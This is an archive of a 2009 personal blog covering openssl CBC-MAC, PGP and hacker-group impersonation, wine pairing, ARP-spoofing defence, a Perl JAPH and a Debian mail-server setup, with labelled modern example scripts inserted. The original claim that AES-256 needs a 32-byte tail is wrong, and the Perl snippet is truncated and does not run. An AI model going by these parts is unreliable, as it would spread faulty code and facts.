openssl enc -e -aes-128-cbc -K 0123456789ABCDEF0123456789ABCDEF -iv 00000000000000000000000000000000 < testdata | tail -c 16 | od -h




The 16 in “tail -c 16” corresponds to the block size of the encryption algorithm. If you were using aes-256-cbc you’d want to say 32 instead of 16. I don’t like the “od -h” representation, but hex is more common and I don’t care to dig through the options just to get hex. You could instead use | openssl enc -e -base64 if you prefer base64.
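The same CBC-MAC computation wrapped as a shell function, added here as an example and not part of the original post; it assumes the openssl, od, head and tail tools. Three things the one-liner glosses over: AES has a 16-byte block for every key size, so the tail -c 16 stays 16 with aes-256-cbc and only the -K value grows to 64 hex digits; a CBC-MAC needs a fixed all-zero IV and a deterministic padding rule (here zero bytes up to a block boundary, with -nopad so the last ciphertext block is exactly the tag), otherwise the same message yields different tags; and raw CBC-MAC is only safe for messages of a single fixed length, so use CMAC or HMAC when lengths vary. Because a one-block message with a zero IV makes CBC identical to ECB, the NIST SP 800-38A ECB test vectors serve as known answers.

```shell
#!/bin/sh
# Added example: AES-CBC-MAC of a file with the openssl CLI (assumes openssl,
# od, head and tail are installed; this is not the post's own code).

# cbc_mac KEYHEX FILE -> prints the 16-byte tag as 32 hex digits.
# KEYHEX must be 32, 48 or 64 hex digits (AES-128/192/256).  The IV is fixed
# at all-zero as CBC-MAC requires, and the input is zero-padded to a multiple
# of the 16-byte AES block so that -nopad can be used and the final ciphertext
# block is exactly the tag.  Every AES variant has a 16-byte block, so the tag
# length does not change with the key size.
cbc_mac() {
  key=$1; file=$2
  case ${#key} in
    32) cipher=aes-128-cbc ;;
    48) cipher=aes-192-cbc ;;
    64) cipher=aes-256-cbc ;;
    *)  echo "cbc_mac: key must be 32, 48 or 64 hex digits" >&2; return 1 ;;
  esac
  size=$(wc -c < "$file")
  pad=$(( (16 - size % 16) % 16 ))
  { cat "$file"; head -c "$pad" /dev/zero; } |
    openssl enc -e -"$cipher" -K "$key" -iv 00000000000000000000000000000000 -nopad |
    tail -c 16 | od -An -v -tx1 | tr -d ' \n'
}

# Constructed sample: the 16-byte NIST SP 800-38A plaintext block
# 6bc1bee22e409f96e93d7e117393172a, written with printf octal escapes so no
# hex tool is needed.  One block under a zero IV means CBC == ECB, so the
# published ECB vectors are the expected tags:
#   AES-128 key 2b7e151628aed2a6abf7158809cf4f3c -> 3ad77bb40d7a3660a89ecaf32466ef97
#   AES-256 key 603deb10...14dff4                  -> f3eed1bdb5d2a03c064b5a7e3db181f8
write_sample() {
  printf '\153\301\276\342\056\100\237\226\351\075\176\021\163\223\027\052' > "$1"
}

sample=$(mktemp)
write_sample "$sample"
echo "AES-128 CBC-MAC: $(cbc_mac 2b7e151628aed2a6abf7158809cf4f3c "$sample")"
echo "AES-256 CBC-MAC: $(cbc_mac 603deb1015ca71be2b73aef0857d77811f352c073b6108d72d9810a30914dff4 "$sample")"
rm -f "$sample"
```

Whatever consumes the tag should compare it with a constant-time comparison; a shell string test is fine for a demo but leaks timing if it ever sits on a network path.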

CSS Is Awesome

Go buy one.

Anti-Sec spoof threatens s'kiddie mayhem

The problem with not giving a verifiable identity is that now anyone can claim to be you and there’s no way for you to dispute the claims or actions of an impersonator.



I was thinking about these site defacements by Anti-sec and came up with what I thought could secure or destroy their credibility. If they breached a site they could leave a PGP/GnuPG public key and explain that they’re tired of the copycats and that all future “messages” would be signed by a key that’s signed by this key. The intermediate key should have an expiration no longer than a couple months. In theory, all future attacks can be verified as the work of Anti-sec or not.



That is, unless someone not in Anti-sec beats them to the punch. If someone outside of Anti-sec posted such a key claiming to be Anti-sec, especially noting that they’re tired of the impersonators, it goes into an “our word against theirs” situation. The impostor(s) would then have to conduct a few more breaches in the same style as Anti-sec to establish “legitimacy”.



In theory a public key can serve as a verifiable identity, but it doesn’t quite work like that. It can really only be used to verify that someone has access to the corresponding private key. Someone can throw their key out there claiming to be Brad Pitt and we have to decide whether or not to accept his in-person denial of that claim. Having committed crimes, no one from Anti-sec is going to step forward in person and prove they’re Anti-sec (somehow) to make authoritative claims about a public key. I think the difference between private key holder and identity is sufficiently subtle that most people wouldn’t quite perceive the difference. They could stand to lose a lot of credibility.
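The scheme sketched above (a long-lived root key endorses a short-lived signing key, and every later message is signed by the current signing key) as an added example, not the post’s own code, built with the openssl CLI and RSA keys standing in for PGP. The file names, the expires= line and the date format are assumptions. It shows what verification does and does not prove: a message passes only if its signing key was endorsed by the pinned root and the endorsement has not expired, but the script says nothing about who published root.pub first, which is the point of the paragraph above.

```shell
#!/bin/sh
# Added example (not from the post): key continuity with a root key and a
# short-lived signing key, using the openssl CLI.  Assumes openssl, sed and
# grep; file names and the "expires=YYYY-MM-DD" line are this example's own.

workdir=$(mktemp -d)

# make_keys EXPIRES: creates root and signing RSA keypairs; root signs the
# signing public key together with its expiry date.  A verifier pins root.pub.
make_keys() {
  openssl genrsa -out "$workdir/root.key" 2048 2>/dev/null
  openssl rsa -in "$workdir/root.key" -pubout -out "$workdir/root.pub" 2>/dev/null
  openssl genrsa -out "$workdir/signing.key" 2048 2>/dev/null
  openssl rsa -in "$workdir/signing.key" -pubout -out "$workdir/signing.pub" 2>/dev/null
  { cat "$workdir/signing.pub"; printf 'expires=%s\n' "$1"; } > "$workdir/signing.cert"
  openssl dgst -sha256 -sign "$workdir/root.key" \
    -out "$workdir/signing.cert.sig" "$workdir/signing.cert"
}

# sign_message FILE: writes the detached signature FILE.sig with the signing key.
sign_message() {
  openssl dgst -sha256 -sign "$workdir/signing.key" -out "$1.sig" "$1"
}

# verify_message FILE TODAY(YYYY-MM-DD):
#   0 = genuine, 1 = signing key not endorsed by the pinned root,
#   2 = endorsement expired, 3 = message signature does not verify.
verify_message() {
  # 1. the pinned root must have signed the (key, expiry) file
  openssl dgst -sha256 -verify "$workdir/root.pub" \
    -signature "$workdir/signing.cert.sig" "$workdir/signing.cert" >/dev/null 2>&1 || return 1
  # 2. the endorsement must still be valid today
  expires=$(sed -n 's/^expires=//p' "$workdir/signing.cert")
  today_n=$(printf '%s' "$2" | sed 's/-//g'); exp_n=$(printf '%s' "$expires" | sed 's/-//g')
  [ "$today_n" -lt "$exp_n" ] || return 2
  # 3. the message must verify under the key taken from the endorsed file,
  #    never from a loose signing.pub that anyone could have supplied
  grep -v '^expires=' "$workdir/signing.cert" > "$workdir/endorsed.pub"
  openssl dgst -sha256 -verify "$workdir/endorsed.pub" \
    -signature "$1.sig" "$1" >/dev/null 2>&1 || return 3
  return 0
}

# Demo run with a constructed message and dates.
make_keys 2009-09-30
msg="$workdir/message.txt"
printf 'statement one\n' > "$msg"
sign_message "$msg"
verify_message "$msg" 2009-07-25 && echo "genuine" || echo "rejected (code $?)"
verify_message "$msg" 2009-10-01 && echo "genuine" || echo "rejected (code $?)"
rm -rf "$workdir"
```

Rotating the signing key is just make_keys again with a new expiry, signed by the same root; the root key itself never has to leave wherever it is stored.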



When you want to be anonymous but still make claims of identity, remember:



Wednesday, July 22, 2009

Tips on Wine

I know… basically crap about wine but my friend Gordon knows quite a bit. I respect Gordon a lot so I try to learn about wine here and there. My hurdle is that I don’t drink enough to buy bottles of wine for myself and my girlfriend doesn’t drink at all.



I thought I’d share what he shared with me on how to do well as a wine newbie.




Both of you have asked me about what wine to buy. Here is a list of wineries that produce good wines each year. The list is in no particular order.



  • Beringer

  • Kendall Jackson

  • Robert Mondavi

  • Meridian

  • Kenwood

  • Clos du Bois

  • Beaulieu Vineyards

  • Michael Pozan

  • Beaujolais Villages

  • Macon

  • Yellow Tail

  • Rosemount

  • Santa Rita

As far as types of wines go, Chardonnay is the most versatile white wine and the most variable depending on what region it comes from. Bringing Chardonnay or White Bordeaux for fish is always safe. I have found Pinot Grigio and Sauvignon Blanc to be good with lighter fish and especially shellfish. A blend of Chardonnay and Pinot Grigio is not easy to find but it is the best I have found for shellfish.



Merlot is the most versatile red wine and the most variable. It is heaviest (Cabernet-like) from California and France. It is much lighter (like Beaujolais) from South America and Australia. With meat or highly seasoned food it is always safe to bring a Cabernet, Syrah, Malbec or a Merlot from California. For an Italian meal or pizza, Valpolicella, Chianti (not a Chianti Reserve, which is a good substitute for a Cabernet), a Shiraz from South America or Australia, as well as a Beaujolais or a Merlot from South America or Australia are all good choices. For cheese, a Cabernet from South America or Australia as well as a Bordeaux from France are good choices. A Bordeaux from France is a little heavier than a Merlot from South America or Australia and lighter than a Merlot from California. A Bordeaux is a versatile wine and goes well with meat dishes as well as Italian food. I have found Bordeaux to be much more consistent than Merlot. Your mother and Ilona have a decided preference for French wines.



In terms of countries, the French are the most consistent. A French Chardonnay is always a good choice for fish. A French Cabernet for steaks is a good choice. A Bordeaux is great for lamb or Italian food or spicy foods in general. A Beaujolais is great as a red wine for fish, especially when highly seasoned, as well as just for sipping or for appetizers.


Tuesday, July 21, 2009

New Technology to Make Digital Data Self-Destruct

Apparently these researchers have never heard of copy and paste. Or screenshots. Or DRM.



This kind of “technology” scares me. People will use this technology thinking their privacy is assured because a message can’t be read after a certain time.



Once you let a piece of data out, it is out. Any attempts to get rid of it are futile.




“The Net interprets censorship as damage and routes around it.”
- John Gilmore




The Internet is just as much a collection of people as it is networking equipment and computers. It is the people that route around censorship and will always find ways to find, circulate, and keep the information they want.

Monday, July 20, 2009

New graphics card

I play WoW and like to run my settings high. I found that pretty much all the fog effects kill my frame rate. Eventually I spent about $200 on an EVGA GeForce 260 GTX 216. I cranked every setting in WoW to the max. I flew out of Dalaran over Crystalsong Forest and almost threw up. I could see everything. Normally the distance fog limits what I can see from high up but this time I could see the entire zone. I got a very strong feeling of vertigo from the realness of the altitude that I haven’t previously experienced in a video game.



Holy crap.

Eternal Earth-Bound Pets

Boarding for pets left behind by The Rapture.

Sunday, July 19, 2009

ARP Spoofing

respecting: hello i want to prevent attacks from software like cain and abel
respecting: what must i do ?
crunge: respecting: learn the attacks that tool X does then prepare appropriate defenses for those attacks
respecting: cain and abel made arp spoofing attacks
respecting: can you please give me a tool to prevent such attack?
respecting: Thanks in advance
crunge: respecting: Do you understand the nature of ARP spoofing?
respecting: Yes
respecting: i understand it
respecting: but i don’t know how can i prevent such attacks?
respecting: Can you please help me?
crunge: respecting: the solution is simple - hard code the ARP entries for each device in each device on the network
crunge: respecting: rather, get rid of ARP by hard-coding the IP-MAC relationships
crunge: I didn’t want to insult you by asserting that you don’t understand ARP and ARP spoofing, but I guess I’m content insulting you with an absurd resolution
crunge: To my knowledge there isn’t a good way to prevent ARP spoofing with software. Some switches will allow you to specify which IPs should be seen on each port
crunge: what you can do is get a tool like arpwatch that will track ARP replies and alert you when an IP-MAC relationship changes
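The detection crunge describes at the end, tracking ARP replies and alerting when an IP-to-MAC binding changes, as an added example that is not part of the conversation. It assumes the one-line-per-packet text that tcpdump -n arp prints on Linux and uses a constructed capture with RFC 5737 documentation addresses; arpwatch does the same job as a daemon with a persistent database.

```shell
#!/bin/sh
# Added example, not from the chat above: an arpwatch-style check that reads
# ARP replies and flags any IP whose MAC address changes.  Input is assumed to
# be the text "tcpdump -n arp" prints on Linux, one packet per line, e.g.
#   12:00:01.000000 ARP, Reply 192.0.2.1 is-at 02:00:00:00:00:01, length 28
# Assumes awk; the capture below is constructed.

# arp_changes FILE: prints one CHANGE line per IP-to-MAC change seen in the
# replies; returns 1 if any change was found, 0 otherwise.  Requests are
# ignored, since only a reply binds an IP to a MAC.
arp_changes() {
  awk '
    $2 == "ARP," && $3 == "Reply" && $5 == "is-at" {
      ip = $4; mac = tolower($6); sub(/,$/, "", mac)
      if ((ip in seen) && seen[ip] != mac) {
        printf "CHANGE %s: %s was %s, now %s\n", $1, ip, seen[ip], mac
        changes++
      }
      seen[ip] = mac
    }
    END { exit (changes > 0) }
  ' "$1"
}

# Constructed capture: the gateway 192.0.2.1 is announced by one MAC and then,
# a few seconds later, by another.  That flip is what arpwatch would report;
# it can be a spoofing tool, but also a replaced router or a DHCP lease handed
# to a different host, so the alert is a prompt to look, not a verdict.
write_sample() {
  cat > "$1" <<'EOF'
12:00:00.000000 ARP, Request who-has 192.0.2.1 tell 192.0.2.20, length 28
12:00:00.000100 ARP, Reply 192.0.2.1 is-at 02:00:00:00:00:01, length 28
12:00:01.000000 ARP, Reply 192.0.2.20 is-at 02:00:00:00:00:14, length 28
12:00:03.000000 ARP, Reply 192.0.2.1 is-at 02:00:00:00:00:01, length 28
12:00:05.000000 ARP, Reply 192.0.2.1 is-at 02:00:00:00:00:99, length 28
12:00:06.000000 ARP, Reply 192.0.2.20 is-at 02:00:00:00:00:14, length 28
EOF
}

sample=$(mktemp)
write_sample "$sample"
arp_changes "$sample" || echo "ARP binding changed: investigate before trusting this segment"
rm -f "$sample"
```

Run against a live capture with tcpdump -l -n arp | arp_changes /dev/stdin; the first reply for each IP is trusted on sight, which is the same trust-on-first-use weakness arpwatch has and the reason static entries on the switch (as the chat mentions) are the stronger control.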

Wednesday, July 15, 2009

I’ve taken this image for my Favicon/Avatar with permission from the artist. I’ve always liked koi but more so after reading “Flatland” and “Hyperspace”. The latter shares the idea that fish might have scientists who wonder about the nature of their universe (the water) and what’s beyond it. Because they cannot openly pass the boundary of the water, nor do they have good reason to do so, they have little idea what’s outside their universe and most have no concern about the topic.



I think we’re not unlike the fish. There are the boundaries of our everyday experience and we seldom think about what’s past them. If we could break out of our everyday experience we might discover a universe greater in scale and wonder than we are capable of imagining.



Take a few moments to browse this artist and discover his work.

Sunday, July 12, 2009

Down Atheist, Down!

I think I’m right so you’re stupid



In terms of religious beliefs I think of myself as an agnostic working under atheist assumptions. I’m an agnostic because I don’t have the chutzpah to assert that small, short-sighted, fallible me somehow knows that there can’t be something powerful enough to escape my notice. Maybe God just manifests himself as neutrinos which easily escape my notice. I also don’t care to search for a God so I need to direct my life somehow. I assume there isn’t a God because that seems like a logical premise that matches my observations.



The key for me is that I’m willing to come right out and state that I don’t know what I’m talking about. My assumption that there isn’t a God is based purely on rhetoric, not on scientific, mathematical, or other proof. Because I don’t actually know anything about the subject matter I’m hardly in a position to tell others that they are wrong.



I’ve seen a lot of pro-atheist hate on the Internet over the last few months and frankly it makes me sad. Many articles and postings are targeted specifically at Christianity and are in the vein of, “Hey, look at this silly thing that these Christians believe!!” except there’s more lolspeak. Many atheists that you encounter are such because they’re lashing out against a set of beliefs that were thrust upon them. Don’t they see that their ridicule is no different? Ridicule serves three purposes: to make the giver feel artificially superior, to make the receiver feel artificially inferior, and to try to change the behavior of the receiver. The first two are of no merit, the last is exactly the kind of thing the “lashing out” atheists started lashing out against to begin with.



I think these self-serving atheists would do well to actually make friends with some Christians and see how that goes. The Christians that I know are fallible people who have found something that guides them toward being a better person and helping those in their community. The news reports child molestations, prayer in place of medical services, and other ways that any religion can be used incorrectly. But the news also reports terrorist bombings, natural catastrophes, and disease outbreaks. If any of these things were commonplace they would be normal and not newsworthy. You seldom see a news report about a school bus that collects all the children and gets to school without incident because that is what normally happens - it’s what you would expect. In the same vein, most Christians are normal, boring people who do normal, boring things except they try to better their lives and the lives of those around them.



I suspect a lot of loud-mouth atheists who like to tell others that those people’s beliefs are false on the Internet are really closet atheists. On the Internet they’re happy to spout off about their intellectual superiority. I bet when they’re with their friends who aren’t atheists they keep their mouths shut because they know that such behavior is asshole behavior. They’re content to be an asshole on the Internet when no one knows who they are but in person they’re afraid of being a dick (which they would be).



To the smarter-than-thou atheists I issue this challenge: prove that atheism brings more benevolence on a door-to-door basis than any major religion. I don’t think I’ve ever heard of an atheist bake sale to raise money for a local school. PTA bake sales seem to do that just fine without religious dogma attached. Personally I believe that religion is like color, gender, and nationality in that it has less to do with one’s behavior than how a person is raised and their own character.

Monday, July 6, 2009

Hello World JAPH

This is my first JAPH although it prints hello world! instead. I wrote it for this because I like challenges.



This type of JAPH has probably already been done but it was fun to do.




#!/usr/bin/perl
use warnings;
use strict;
open my $fh,';
$self =~ s/[^a-z !]//g;
print map { substr($self,$_,1) } qw(42 8 62 10 55 26 15 33 9 -46 47 0);


I got Win #44.

Tuesday, June 30, 2009

Passive-Aggressive SSIDs

IllBroadcastOnMyAPWhatImScaredToTellYouInPerson



IAMLAME
I’ve seen a number of these on time waster blogs like Digg and reddit. Unfortunately this is the only one I had the presence of mind to save a link for.



How lame is that? Your neighbors are loud on their balcony. Your neighbors are loud having sex. You know what they’ll do if they see this? They will be louder because all you’ll do is change your WiFi SSID to something even more lame.



You want to have a sense of smug satisfaction and have the problem stop? Walk up to their door and knock on it. Politely ask them to be more quiet. You don’t even have to threaten to call the cops. If they’re having a party they might even invite you in, especially if you bring good beer like Newcastle or Fat Tire.



But all stuff like this does is show how you’re not actually going to do anything about the problem.

Saturday, June 27, 2009

Garmin nuvi 265WT

I bought an automotive GPS unit a couple days ago <masculine>so my girlfriend won’t get lost</masculine>. Specifically I got a Garmin nuvi 265WT. This thing is very nice.



The mounting is a mechanical suction cup with an arm featuring a ball on the end. The ball goes into a socket on the device-holding clip. The suction cup has a great grip on my windshield (and kitchen counter) and the ball and socket is easy enough to move without being loose. Once I figured out that you put the GPS into the clip bottom-first I found that it’s easy to pop in and out.



It took about five minutes for it to initially get its bearings (nyuck, nyuck) sitting on an outside table on a cloudless day. Once it figured out where it was it’s been solid for location.



The navigation is easy to use and with the preloaded maps it only makes you type until there are only a few possible cities, streets, etc for you to choose from. It allows you to save locations and one location can be saved as “home”. When you go to select a destination there’s a great big “Go Home” button that makes it easy to get to your most common destination.



I found the turn-by-turn with street names to be excellent. After you make a turn it tells you how far ahead you need to do something and what you need to do. When you’re almost there it lets you know, and again when you’re there. The former seems to give you enough time to get into the proper lane. When I was on the freeway approaching my exit it spoke more frequently but not often enough to become annoying. It did pronounce La Jolla (Lah Hoya) as Lay Jollah but since it was the American English voice and not Spanish it’s understandable.



Wonder of wonders it came with a USB cable. I plugged it in and went to the website to see what was available. They had a simple to use tool to get system updates and a tool to download additional vehicle models and voices. The vehicle model is the image of your vehicle drawn on the street. According to our GPS we are actually driving a tank and not a Matrix. This is useless, but fun. I was surprised to find that in addition to the SD card reader the thing has 2GB of built-in flash. Most of this is taken up with software and maps but there was like 600MB free. That’s a lot of room for saved routes and waypoints.



Another feature of this is built-in bluetooth speakerphone-ness. After a little fiddling I had it paired with my girlfriend’s nV2. I could use the speakerphone to access the nV2’s built-in voice dialing. Very nice. The speaker quality wasn’t outstanding but it was easy to understand the other person, and when I was outside the car on my iPhone handset I thought the nuvi’s microphone pickup was very good.



I haven’t used it a ton yet but so far I feel like I definitely got my money’s worth. I would recommend this to anyone interested in an in-car GPS, especially if they have a bluetooth-enabled phone.

Thursday, June 25, 2009

Half-game Downloads

It’s valuable to give you only half of what you paid for.



http://hellforge.gameriot.com/blogs/Hellforge/EA-Games-Everything-On-The-Disc-Is-A-Demo



So to foil pirates they’re only giving you half the game on the disk. The rest you have to download… having already paid for the game. This isn’t a patch or content update, this is content they just didn’t put on the disk.



Mr. Riccitello says:




So the point I’m making is, yes I think that’s the answer [to piracy]. And here’s the trick: it’s not the answer because this foils a pirate, but it’s the answer because it makes the service so valuable that in comparison the packaged good is not.




My thoughts:




The great thing about a game on a disk is that I can go to the store, buy it now, and play it now. The great thing about a downloadable game is that I don’t have to leave the house provided I’m willing to wait a bit.



This synergistically combines the worst aspects of both technologies.




So here’s an idea. To stop criminals we’ll sell handguns without firing pins. Then we’ll let you order the firing pin from our website at no charge. We have thus revolutionized the way people think about buying handguns and have added value to our website. Oh, and stopped criminals from getting firing pins somehow.

Wednesday, June 24, 2009

Web Log Retention

I hang out in some IRC channels to share questions and generally admire how smart I am. Sometimes parts of the discussion are worth sharing.

mnex: should access_log be considered confidential information?
crunge: mnex: confidential, yes
crunge: mnex: at the very least it’s proprietary business information that helps in the analysis of the effectiveness of one’s website and marketing
crunge: mnex: business aside, your visitors probably don’t want everyone to know what they’ve been looking at.
crunge: mnex: also, sometimes URLs contain sensitive information like search terms, user names, addresses, phone numbers, etc

Sunday, June 21, 2009

Chicken Parmesan a la Kludge

Wikipedia describes a Kludge as:




A kludge (or kluge) is a workaround, an ad hoc engineering solution, a clumsy or inelegant solution to a problem, typically using parts that are cobbled together.




How could one cobble together a fancy Italian dish with random stuff?



  1. Lower your standards for Italian food, dramatically.

  2. Bake frozen chicken fingers according to their instructions.

    • I like white meat chicken fingers and since there’s no such thing as ritzy chicken fingers the ceiling is pretty low in “springing for the good stuff”.


  3. While the chicken fingers are baking, microwave 1-2 cups of spaghetti sauce in a microwave-safe container. I use a Pyrex measuring cup. Know that hot tomato sauce will corrode Tupperware.

    • Be sure to cover (not seal!) your container with something like a paper towel so it doesn’t splatter.

    • Nuke for a minute or so, stir, check the sauce temperature, not the container temperature.

    • Repeat until hot.

    • Make sure it’s good spaghetti sauce like Prego. If it’s not, you can try adding powdered garlic, powdered onion, allspice, pepper, etc. But you’re not going to make it awesome. Just buy the good stuff up front.


  4. Once the chicken fingers are done baking, divide evenly on your finest plastic kitchenware.

  5. Cover them uniformly with shredded mozzarella or provolone.

  6. Cover that with piping hot pasta sauce to melt the cheese.

  7. Optionally, cover with grated parmesan. Given the name “chicken parmesan” I have no idea why this is an optional step.

Serves an arbitrary number of people, depending on how much stuff you buy and how much your people eat.

Saturday, June 20, 2009

The Duel

I may have dug myself into a hole but the results of the slide down should be interesting. My first “blog” was on Freenet and my most common post was to the effect of, “Sorry I haven’t updated in a while..”. I suspect that something of that nature is the most common update to blogs. Seeing a friend make such a reference I decided to open my big fat mouth and make a challenge.



I think this might be a unique challenge on the tubes. I challenged another blogger to a duel - For each full 24 hour period that one of us has a newer post of merit the other gains a point. The first to accumulate 100 points loses. If we each make posts just under every 48 hours and they’re properly interleaved we could go on indefinitely with neither of us accumulating a point. That’s a lot of pressure but I expect it will be good for both of us and our sites.



My original challenge with a spelling correction:




I challenge you to a duel, sir. We both have blogs that have grown relatively sleepy as of late. My challenge is this: For each full day that one of us has a newer blog post of merit the other accumulates one point. The first to accumulate 100 points is the loser.



Blog posts about the duel do not count, save for the first acknowledgment of the duel from each of us. Blog posts about life events, interests, hobbies, humorous anecdotes, and relevant responses to the others’ blog posts are all of merit.



Do you accept my challenge, sir?




Let’s see how this goes.

Thursday, June 18, 2009

Virtual Mail Hosting with Postfix, Cyrus and Roundcube

My sister makes delicious fudge and sells it online through her website http://sanfordfudge.com. Being the computer geek in the family, I helped get it set up and deal with a little of the day-to-day requirements of the website. One of those requirements is that order notification emails are routed properly. As a knowledgeable Linux geek I’m undaunted by the idea of running my own mail system and would rather do that than have it hosted.



My platform of choice is Debian because of its stability and ease of management for the command-line adept. I’m providing my setup notes below with some commentary so that they might help someone else get their mail system online. These instructions should hopefully translate decently well to other distributions although the package names, config file locations, and default configuration choices are likely to be different.



I chose Postfix because it’s simple and works very well. I have experience with Sendmail and would like to keep it in the past. I chose Cyrus IMAP based on recommendations from peers. It’s my understanding that if my setup were to become more complex Cyrus would make those complex scenarios easier to implement. I chose Roundcube because it’s clean, easy to use, and has given me very few problems in the years I’ve been using it for my own mail.



These instructions are not a step-by-step guide. If you’re familiar with Linux and Debian they can probably get you through it. If not you may find some difficulty on systems other than Debian Lenny.



What’s Missing



  • SSL - I don’t explain how to set up SSL for the webmail. It is essential that you do this.

  • Spam filtering/Virus protection - Not there yet

  • SPF/Domain Keys - These are good for getting your mail through other people’s spam filters

  • Directory Services - There’s no expectation that we’ll need to coordinate on a big list of contacts, but Roundcube does have LDAP address book support

  • Users can’t change their own passwords - not something we need

  • Other features we didn’t need.

Debian Setup



I always install Debian stripped down, with no package sets selected. In this case I’m using the latest release, Lenny (5.0). I edit my sources to include non-free and contrib. I then run apt-get update. I apt-get install sudo openssh-server vim-nox and add my normal user to the sudoers with ALL=(ALL) ALL. I log out and log in as my personal user. I install the necessary packages:




sudo apt-get install postfix ca-certificates cyrus-imapd-2.2 sasl2-bin libsasl2-modules cyrus-admin-2.2 cyrus-clients-2.2 apache2-mpm-prefork libapache2-mod-php5 php5-mysql php5-mcrypt mysql-server-5.0



Be sure to choose a good password for MySQL and install postfix as Internet Site.



Because this is a very small setup I’d prefer to use SQLite over MySQL. I’m not a MySQL fan at all. Unfortunately Debian prefers SQLite3 (which I also prefer) but Roundcube seems to only support SQLite2. Rather than hack it to make it work I’ll just make a different selection.



I download the 3.0 beta Roundcube tarball from http://roundcube.net/downloads.



Postfix needs to be in the mail group to communicate with Cyrus the way we’re using it so I add the postfix user to the mail group.



Cyrus SASL



Cyrus SASL provides saslauthd which, for our purposes, abstracts away the complexities of various authentication mechanisms to a single interface. We’re going to use a simple database file but later on it could be scaled up to use SQL, LDAP, Kerberos, or something else.



In /etc/default/saslauthd set MECHANISMS="sasldb" and START=yes. Next we need to create users and set passwords for them. Choose good passwords, particularly for the cyrus user because that is your administrative user.




sudo saslpasswd2 -c -u hostname usera
sudo saslpasswd2 -c -u hostname userb
sudo saslpasswd2 -c -u hostname cyrus
sudo /usr/sbin/sasldblistusers2
sudo /etc/init.d/saslauthd restart
sudo testsaslauthd -u usera -r hostname -p blarg


The last command allows you to ensure authentication is working. In that example usera’s password is blarg, which is a terrible password. If a user is having trouble logging in later, ensure that this works.



Cyrus IMAP



This configuration is only allowing mail access via a web-based mail service. Therefore we don’t need IMAP remotely accessible and don’t need POP or NNTP at all.



  • In imapd.conf uncomment imap_admins: cyrus

  • In cyrus.conf, SERVICES section, set the imap line to have listen="127.0.0.1:imap", and ensure the pop and nntp lines are commented out

  • Restart cyrus

Run cyradm --user cyrus localhost and use the password you created for the cyrus user.




> cm user.usera
> cm user.userb
> quit


The cm command creates a mailbox. Note that the usernames are prefixed with user. and the domain is not specified. This took me some time to figure out despite the fact that the logs were telling me exactly why my mail wasn’t reaching the mailboxes.



Postfix



I made these edits to the main.cf. In your configuration make sure that if these are duplicates of existing settings that you comment out the original settings or merge them appropriately. I’m using SSL/TLS optionally so systems that support using encryption with SMTP will do so. Those that don’t will function normally. I’m using the Debian-generated Snake Oil cert. This may be a bad choice for you. Make sure you understand where your certificate and keypair came from.




# add to main.cf
virtual_transport = lmtp:unix:/var/run/cyrus/socket/lmtp
virtual_mailbox_domains = sanfordfudge.com
virtual_mailbox_maps = hash:/etc/postfix/vmailbox
virtual_alias_maps = hash:/etc/postfix/virtual



# Make sure this is in main.cf
smtpd_tls_security_level = may
smtp_tls_security_level = may
# comment out this
#smtpd_use_tls=yes


I have to create two new files in the /etc/postfix/ directory, virtual and vmailbox. Here are their contents:




# /etc/postfix/vmailbox
usera@sanfordfudge.com usera@myhostname
userb@sanfordfudge.com userb@myhostname



# /etc/postfix/virtual
inquiries@sanfordfudge.com usera@sanfordfudge.com, userb@sanfordfudge.com


I had to edit the master.cf so that postfix could properly deliver mail to Cyrus. This required telling postfix that the Unix socket being used is not inside a chroot.




# change
lmtp unix - - - - - lmtp
# to
lmtp unix - - n - - lmtp


For speed our virtual and vmailbox files are hashed databases and those databases need to be regenerated any time the source files are changed.



jason@hostname:/etc/postfix$ sudo postmap virtual vmailbox



And restart postfix.
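Before running postmap it is worth checking that the two tables agree with each other. This is an added example, not part of the post, and the sample maps are constructed with example.test rather than the real domain. postmap accepts any syntactically valid line, but an alias whose target is an address in a hosted domain with no mailbox entry, or a mailbox whose domain is not in virtual_mailbox_domains, only shows up later as rejected mail in the log (the "user unknown in virtual mailbox table" that the Cyrus section mentions being puzzled by). The check assumes the one-key-per-line format shown above and awk.

```shell
#!/bin/sh
# Added example, not from the post: a consistency check for the virtual alias
# and virtual mailbox tables, run before "postmap virtual vmailbox".
# Assumes awk and the key/value-per-line format used above; samples constructed.

# check_virtual_maps VMAILBOX VIRTUAL "domain1 domain2 ...":
#   prints one line per problem and returns 1 if any were found, else 0.
check_virtual_maps() {
  awk -v domains="$3" '
    BEGIN { n = split(domains, d, " "); for (i = 1; i <= n; i++) hosted[d[i]] = 1 }
    /^[ \t]*#/ { next }                            # comment lines
    NF == 0 { next }                               # blank lines
    FILENAME == ARGV[1] {                          # vmailbox: key is a mailbox address
      mbox[$1] = 1
      dom = $1; sub(/^[^@]*@/, "", dom)
      if (!(dom in hosted)) {
        printf "unreachable: mailbox %s is not in virtual_mailbox_domains\n", $1; bad++
      }
      next
    }
    {                                              # virtual: key, then comma/space separated targets
      alias[$1] = 1
      rhs = $0; sub(/^[^ \t]+[ \t]+/, "", rhs); gsub(/,/, " ", rhs)
      m = split(rhs, t, " ")
      for (i = 1; i <= m; i++) pair[++np] = $1 SUBSEP t[i]
    }
    END {
      for (k = 1; k <= np; k++) {
        split(pair[k], p, SUBSEP); a = p[1]; target = p[2]
        if ((target in mbox) || (target in alias)) continue
        dom = target; sub(/^[^@]*@/, "", dom)
        if (dom in hosted) {                       # our domain, but nothing accepts it
          printf "dangling: %s -> %s (no mailbox or alias)\n", a, target; bad++
        }                                          # a remote address is simply forwarded
      }
      exit (bad > 0)
    }
  ' "$1" "$2"
}

# Constructed samples in the same layout as the post's two files.
write_samples() {
  cat > "$1/vmailbox" <<'EOF'
# virtual_mailbox_maps
usera@example.test usera@myhostname
userb@example.test userb@myhostname
EOF
  cat > "$1/virtual" <<'EOF'
# virtual_alias_maps
inquiries@example.test usera@example.test, userb@example.test
orders@example.test    inquiries@example.test
sales@example.test     userc@example.test
archive@example.test   someone@elsewhere.invalid
EOF
}

demo=$(mktemp -d)
write_samples "$demo"
check_virtual_maps "$demo/vmailbox" "$demo/virtual" "example.test" || echo "fix the maps before running postmap"
rm -rf "$demo"
```

In the sample, orders forwarding to another alias and archive forwarding off-site are both fine; only sales is reported, because userc has no mailbox. A Postfix-side confirmation of any single address is postmap -q address hash:/etc/postfix/vmailbox after the tables are built.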



Roundcube



This Apache configuration is actually not that great. I leave it to the reader to do something better with it. The most significant issue is that it does not include access via SSL. Since you’re sending usernames and passwords to the server you should not leave it this way. There are copious guides to getting this accomplished. Again, know what you’re doing with your certificates.



Unpack the tarball into /tmp.




cd /var/www
